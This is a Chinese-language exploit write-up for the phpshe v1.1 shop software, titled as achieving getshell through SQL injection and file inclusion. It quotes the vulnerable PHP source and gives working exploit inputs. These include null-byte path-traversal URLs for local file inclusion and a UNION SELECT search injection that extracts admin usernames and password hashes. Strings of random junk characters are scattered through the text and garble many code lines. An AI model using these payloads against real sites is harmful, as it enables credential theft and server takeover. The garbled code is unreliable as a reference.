phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
" F" q0 u( U! @. F* E/* Phpshe v1.1 Vulnerability
# ~/ ~: P0 r3 W; W+ \/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
5 z9 e0 K6 ~3 v0 }0 V4 E0 l# Y/*******************************************************/
5 `, e( b  @' ^' r. Q1 U) K2 t+ v0×00 整体大概参数传输
; ?- e. x; Q5 p# Z
# U/ C' M' H$ T4 \+ h- {

2 l$ m7 b9 m* h" r( D//common.php
if (get_magic_quotes_gpc()) {
/ B8 f1 f# J& C, v  \!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
1 x. h$ y& S) b9 c% l( W/ J4 i!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
4 y* M+ `$ n& P, F3 |}
else {
5 [7 p- D/ Q( _9 X. T!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
/ r) q1 U- q) f: P6 O0 w/ Y4 F1 }) Q!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
8 M9 i) m7 ^+ I- s7 l0 ]; ?}
; j0 R: C* Z6 }session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
$ F+ W: m0 U6 A( I1 S
0×01 包含漏洞
' _, Z/ x* T* _* p$ Q9 v

//首页文件
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
: J6 [. @1 Y) n4 D2 pinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
2 V3 {8 c& `% r) ~- w, ~+ C4 q?>
1 y( Z+ t$ i8 A//common 文件 第15行开始
url路由配置
8 c# m1 u; {1 o# I  ?1 c& h- ?$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
) c1 B2 B' v# w5 C0 R3 W; K

0×02 搜索注入
) B- @2 @) P8 c# t* b# ~. Z
, I, `; c/ E4 P: U; D& q* f<code id="code2">

//product.php文件
7 {# \* u7 [1 B) Rcase 'list':
$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
# e% o/ ~+ ]9 v( @- U; `9 h6 e1 Y//搜索
% |+ \. [/ V1 }8 Q# V! _$sqlwhere = " and `product_state` = 1";
4 Q, d+ z" t7 J, `2 s" @6 Gpe_lead('hook/category.hook.php');
if ($category_id) {
% h, X8 V3 o) m) l. {where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
) r1 ~' a: q( @" ^}
5 Y  V( X+ J" v4 u9 k- w6 ]$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
8 ]$ L1 Y* n. f* t6 ]6 A$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
# G: k2 c& j% N5 C  |6 [else {
$sqlwhere .= " order by `product_id` desc";
}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
, I# v, c1 d0 L' G% c) ?% J5 p$product_hotlist = product_hotlist();
% s7 e! ]* O, ]6 E, s9 _' R//当前路径
/ G2 E) L$ z: |3 M+ F7 ]' T$nowpath = category_path($category_id);
7 l+ }0 {$ g/ |$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
4 L2 n9 v9 j( j6 i3 k//跟进selectall函数库
/ P9 |  d3 i/ I  E& K  x* Ipublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
//处理条件语句
( ], A( E* P9 X9 C% o! l$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
+ y; D. e- [; f8 l% F; u}
# z7 d7 k$ g" D7 x3 E//exp
' M# L1 t* _5 P$ U% Nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>
5 i5 m9 Y" S2 n" I/ ?7 W$ ^/ f$ `
5 n" D3 d8 g% t/ k- I! y0×03 包含漏洞2

* p; m5 h: `1 @1 X4 a7 g<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

% b8 h7 Z+ _( p" \5 s+ u5 `$cache_payway = cache::get('payway');

: k7 L8 i2 U+ y% \1 c1 Xforeach($cache_payway as $k => $v) {

. Q8 K/ S  ]' l7 t1 C- ~3 t$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

if ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

}

1 E) f& X2 Z9 t" L}

, e5 \9 f, ^/ m% P/ d/ Y6 D1 S$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

!$order['order_id'] && pe_error('订单号错误...');

" M! o4 f& {- ^& g# h2 a, ~( Y7 gif (isset($_p_pesubmit)) {

& S$ B% D! N: iif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

/ V: a. T' U* \) r+ K3 kforeach ($info_list as $v) {

+ A/ i! U7 `0 {6 s: D0 J$order['order_name'] .= "{$v['product_name']};";
& X; @, @3 U: L3 O9 p$ B- ]# B

}

- C. R5 m/ G7 M+ U: Q3 h6 x# pecho '正在为您连接支付网站，请稍后...';

3 M, Q% I2 W: `include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

8 e! }$ d* M3 e) `4 t( _& ~) ]: Y# C}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

pe_error('支付错误...');

2 J* u0 C. E! }7 F8 X6 ?4 d. \}

}

3 G) ~& s) G8 |, g$ o8 K$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

7 v; T/ ]& @* t5 Y+ Y7 |: h  Abreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
/ j% \# ]2 I3 ?9 E% D' M